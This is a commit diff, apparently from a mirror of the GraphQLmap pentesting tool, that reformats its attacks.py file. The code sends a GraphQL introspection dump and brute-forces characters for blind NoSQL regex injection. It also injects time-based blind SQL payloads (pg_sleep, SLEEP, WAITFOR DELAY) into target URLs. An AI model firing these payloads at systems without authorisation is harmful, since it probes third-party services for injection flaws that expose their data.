swisskyrepo
/
GraphQLmap
mirror of https://github.com/swisskyrepo/GraphQLmap.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Formatted attacks.py and renamed URL parameter of dump_schema to url

pull/11/head
fuomag9 2020-02-05 13:06:53 +01:00
parent e9d51be625
commit ff54061234
1 changed files with 27 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

50
attacks.py
View File

@ -8,20 +8,22 @@ import sys
import time import time
from utils import * from utils import *
def display_types(URL, method, headers): def display_types(URL, method, headers):
payload = "{__schema{types{name}}}" payload = "{__schema{types{name}}}"
r = requester(URL, method, payload, headers) r = requester(URL, method, payload, headers)
if r != None: if r is not None:
schema = r.json() schema = r.json()
for names in schema['data']['__schema']['types']: for names in schema['data']['__schema']['types']:
print(names) print(names)
def dump_schema(URL, method, graphversion, headers): def dump_schema(url, method, graphversion, headers):
""" """
Dump the GraphQL schema via Instrospection Dump the GraphQL schema via Instrospection
:param URL: URL of the GraphQL instance :param headers: Headers to use
:param url: URL of the GraphQL instance
:param method: HTTP method to use :param method: HTTP method to use
:param graphversion: GraphQL version :param graphversion: GraphQL version
:return: None :return: None
@ -32,7 +34,7 @@ def dump_schema(URL, method, graphversion, headers):
else: else:
payload = "fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated:+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated:+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}" payload = "fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated:+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated:+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}"
r = requester(URL, method, payload, headers) r = requester(url, method, payload, headers)
schema = r.json() schema = r.json()
print("============= [SCHEMA] ===============") print("============= [SCHEMA] ===============")
@ -47,15 +49,14 @@ def dump_schema(URL, method, graphversion, headers):
field_type = "" field_type = ""
try: try:
field_type = fields['type']['ofType']['name'] field_type = fields['type']['ofType']['name']
except Exception as e : except Exception as e:
pass pass
print("\t\033[92m{}\033[0m[\033[94m{}\033[0m]: ".format(fields['name'], field_type), end='') print("\t\033[92m{}\033[0m[\033[94m{}\033[0m]: ".format(fields['name'], field_type), end='')
# add the field to the autocompleter # add the field to the autocompleter
cmdlist.append(fields['name']) cmdlist.append(fields['name'])
for args in fields['args']: for args in fields['args']:
args_name = args.get('name') args_name = args.get('name')
args_tkind = "" args_tkind = ""
@ -84,8 +85,8 @@ def exec_graphql(URL, method, query, headers={}, only_length=0):
errors = graphql.get("errors") errors = graphql.get("errors")
# handle errors in JSON data # handle errors in JSON data
if(errors): if errors:
return ("\033[91m" + errors[0]['message'] + "\033[0m") return "\033[91m" + errors[0]['message'] + "\033[0m"
else: else:
try: try:
@ -93,30 +94,31 @@ def exec_graphql(URL, method, query, headers={}, only_length=0):
# handle blind injection (content length) # handle blind injection (content length)
if only_length: if only_length:
return (len(jq_data)) return len(jq_data)
# otherwise return the JSON content # otherwise return the JSON content
else: else:
return (jq(graphql)) return jq(graphql)
except: except:
# when the content isn't a valid JSON, return a text # when the content isn't a valid JSON, return a text
return (r.text) return r.text
except Exception as e: except Exception as e:
return "\033[91m[!]\033[0m {}".format(str(e)) return "\033[91m[!]\033[0m {}".format(str(e))
def exec_advanced(URL, method, query, headers): def exec_advanced(URL, method, query, headers):
print(query) print(query)
# Allow a user to bruteforce character from a charset # Allow a user to bruteforce character from a charset
# e.g: {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}} # e.g: {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}
if "GRAPHQL_CHARSET" in query: if "GRAPHQL_CHARSET" in query:
GRAPHQL_CHARSET = "!$%\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~" GRAPHQL_CHARSET = "!$%\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~"
for c in GRAPHQL_CHARSET: for c in GRAPHQL_CHARSET:
length = exec_graphql(URL, method, query.replace("GRAPHQL_CHARSET", c), headers, only_length=1) length = exec_graphql(URL, method, query.replace("GRAPHQL_CHARSET", c), headers, only_length=1)
print("[+] \033[92mQuery\033[0m: (\033[91m{}\033[0m) {}".format(length, query.replace("GRAPHQL_CHARSET", c))) print(
"[+] \033[92mQuery\033[0m: (\033[91m{}\033[0m) {}".format(length, query.replace("GRAPHQL_CHARSET", c)))
# Allow a user to bruteforce number from a specified range # Allow a user to bruteforce number from a specified range
@ -133,31 +135,33 @@ def exec_advanced(URL, method, query, headers):
# Otherwise execute the query and display the JSON result # Otherwise execute the query and display the JSON result
else: else:
print(exec_graphql(URL, method, query, headers)) print(exec_graphql(URL, method, query, headers))
def blind_postgresql(URL, method, headers): def blind_postgresql(URL, method, headers):
query = input("Query > ") query = input("Query > ")
payload = "1 AND pg_sleep(30) --" payload = "1 AND pg_sleep(30) --"
print("\033[92m[+] Started at: {}\033[0m".format(time.asctime( time.localtime(time.time())))) print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload) injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload)
r = requester(URL, method, injected, headers) r = requester(URL, method, injected, headers)
print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime( time.localtime(time.time())))) print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
def blind_mysql(URL, method, headers): def blind_mysql(URL, method, headers):
query = input("Query > ") query = input("Query > ")
payload = "'-SLEEP(30); #" payload = "'-SLEEP(30); #"
print("\033[92m[+] Started at: {}\033[0m".format(time.asctime( time.localtime(time.time())))) print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload) injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload)
r = requester(URL, method, injected, headers) r = requester(URL, method, injected, headers)
print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime( time.localtime(time.time())))) print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
def blind_mssql(URL, method, headers): def blind_mssql(URL, method, headers):
query = input("Query > ") query = input("Query > ")
payload = "'; WAITFOR DELAY '00:00:30';" payload = "'; WAITFOR DELAY '00:00:30';"
print("\033[92m[+] Started at: {}\033[0m".format(time.asctime( time.localtime(time.time())))) print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload) injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload)
r = requester(URL, method, injected, headers) r = requester(URL, method, injected, headers)
print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime( time.localtime(time.time())))) print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
def blind_nosql(URL, method, headers): def blind_nosql(URL, method, headers):